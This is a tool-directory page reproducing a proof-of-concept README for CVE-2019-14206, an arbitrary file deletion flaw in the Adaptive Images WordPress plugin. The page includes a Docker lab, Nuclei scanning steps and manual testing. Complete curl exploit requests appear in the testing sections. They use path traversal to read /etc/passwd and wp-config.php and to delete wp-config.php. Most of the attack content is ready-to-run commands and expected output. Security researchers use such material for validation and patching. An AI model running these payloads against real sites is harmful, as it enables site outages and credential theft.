Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacyΒ© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2019-14206-poc β€” Proof-of-concept exploit for CVE-2019-14206, demonstrating arbitrary file deletion in the Adaptive Images WordPress plugin. Includes Docker lab, Nuclei template, and manual testing scripts for security education and validation. | Kitploit
Tools/GitHubGitHub/developerfred/cve-2019-14206-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubdeveloperfred/cve-2019-14206-poc

cve-2019-14206-poc

Proof-of-concept exploit for CVE-2019-14206, demonstrating arbitrary file deletion in the Adaptive Images WordPress plugin. Includes Docker lab, Nuclei template, and manual testing scripts for security education and validation.

View Repository
59 months agoNot yet reviewed

Most Popular

View all β†’

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools β†’
Share

CVE-2019-14206 - Adaptive Images for WordPress Arbitrary File Deletion

πŸ“‹ Index

  1. About the Vulnerability
  2. Prerequisites
  3. Installation
  4. Testing Methods
    • Quick Test
    • Full Test with Docker
    • Test with Nuclei
    • Manual Test
  5. Interpreting Results
  6. Cleanup
  7. Troubleshooting
  8. Mitigation
  9. Legal Disclaimer

🎯 About the Vulnerability

CVE-ID: CVE-2019-14206
Severity: High (CVSS 6.5)
Affected Plugin: Adaptive Images for WordPress
Affected Versions: < 0.6.67

What does this vulnerability allow?

This vulnerability allows a remote unauthenticated attacker to delete arbitrary files on the WordPress server by exploiting the Adaptive Images plugin.

Real Impact:

  • ❌ Deletion of wp-config.php causing complete site outage
  • ❌ Exposure of database credentials via LFI
  • ⚠️ Attack chain leading to RCE (Remote Code Execution)
  • πŸ”΄ Total compromise of the WordPress site

Root Cause:

// The plugin uses user input WITHOUT sanitization
$settings = $_REQUEST['adaptive-images-settings'];

// Builds file path with attacker-controlled parameters
$cache_file = $wp_content . '/' . $cache_dir . '/' . $resolution . $request_uri;

// DELETES arbitrary file
unlink($cache_file);

πŸ’» Prerequisites

Minimum Requirements:

  • Operating System: macOS, Linux or Windows
  • Nuclei: Version 3.0 or higher (Install)
  • Bash: Version 4.0 or higher
  • curl: For manual tests
  • PHP: Version 7.0+ (optional, for tests with built-in server)

Checking Prerequisites:

# Check Nuclei
nuclei --version

# Check Bash
bash --version

# Check curl
curl --version

# Check PHP (optional)
php --version 2>/dev/null || echo "PHP not available (optional)"

πŸš€ Installation

Step 1: Clone or Download the Files

# If in the nuclei-templates directory
cd /Volumes/Codingsh/experimentos/nuclei-templates

# Or download the necessary files
git clone https://github.com/projectdiscovery/nuclei-templates.git
cd nuclei-templates

Step 2: Verify File Structure

# Check if the files exist
ls -la http/cves/2019/CVE-2019-14206.yaml
ls -la cve-2019-14206-poc/

Step 3: Make Scripts Executable

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

chmod +x docker-test.sh
chmod +x docker-test-full.sh
chmod +x vulnerability-demo.sh
chmod +x local-test.sh
chmod +x real-target-test.sh

πŸ§ͺ Testing Methods

1. Quick Test ⏱️ 2 minutes

Run the complete demo that simulates the entire exploitation:

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
./docker-test.sh

What happens:

  • Creates full test environment
  • Simulates the vulnerability
  • Demonstrates file deletion
  • Validates Nuclei template

Expected output:

[πŸŽ‰] SUCCESS: wp-config.php DELETED!
[!!!] WORDPRESS SITE IS NOW BROKEN!
βœ… Vulnerability: CVE-2019-14206 confirmed
βœ… Template Status: Production ready

2. Full Test with Docker 🐳 10 minutes

Step 1: Start Docker Environment

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

# If Docker is running
docker-compose up -d

# If Docker is NOT running, use the simulator
./docker-test-full.sh

Step 2: Access WordPress

# The environment will be available at
# http://localhost:8888

Step 3: Check Vulnerable Plugin

# Check if the vulnerable script exists
curl http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php

Step 4: Run Tests

# LFI Test
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# File Deletion Test
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# Check if wp-config.php has been deleted
ls -la /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/wp-config.php

3. Test with Nuclei 🎯 5 minutes

Step 1: Prepare Target List

# Create target file
cat > targets.txt << 'EOF'
http://localhost:8888
https://target-wordpress-site.com
EOF

Step 2: Run Scan

# Basic scan
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt

# Detailed scan
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -v

# Debug scan (MANDATORY for bounty)
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -debug

# Save results
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -o results.txt

Step 3: Interpret Results

# View results
cat results.txt

# Positive results will show:
# [CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion

4. Manual Test πŸ”§ 10 minutes

Step 1: Start PHP Server

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test
php -S localhost:8888

Step 2: Test LFI (File Reading)

# Try to read /etc/passwd
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# Try to read wp-config.php
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../wp-config.php"

Expected result (LFI):

=== CVE-2019-14206 Vulnerability Test ===

[*] Settings received:
  source_file = /etc/passwd
  ...

[*] Cache file: /var/www/html/wp-content/ai-cache/1920/etc/passwd
[*] Source file: /etc/passwd

Step 3: Test File Deletion

# Check if wp-config.php exists BEFORE
ls -la wp-config.php

# Run exploit
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# Check if wp-config.php has been deleted AFTER
ls -la wp-config.php

Expected result (File Deletion):

[+] SUCCESS: Arbitrary file deletion vulnerability confirmed!
[+] Target file deleted: ./../../..//wp-config.php

πŸ“Š Interpreting Results

Positive Result (Vulnerable):

[CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion
http://target-wordpress-site.com/wp-content/plugins/adaptive-images/adaptive-images-script.php

Matchers matched:
- Plugin detected
- LFI vulnerability confirmed
- Arbitrary file deletion possible

Negative Result (Not Vulnerable):

[N/A] No results found

Possible Reasons for False Negative:

  • βœ… Plugin not installed
  • βœ… Plugin updated (version >= 0.6.67)
  • βœ… WAF blocking requests
  • βœ… Server does not respond on expected paths

🧹 Cleanup

Clean Test Environment:

# Remove Docker environment
cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
docker-compose down -v 2>/dev/null

# Remove test files
rm -rf docker-test/
rm -f targets.txt results.txt

# Restore wp-config.php if it was deleted
cat > wp-config.php << 'EOF'
<?php
// Restored file
define('DB_NAME', 'wordpress');
EOF
Download Tool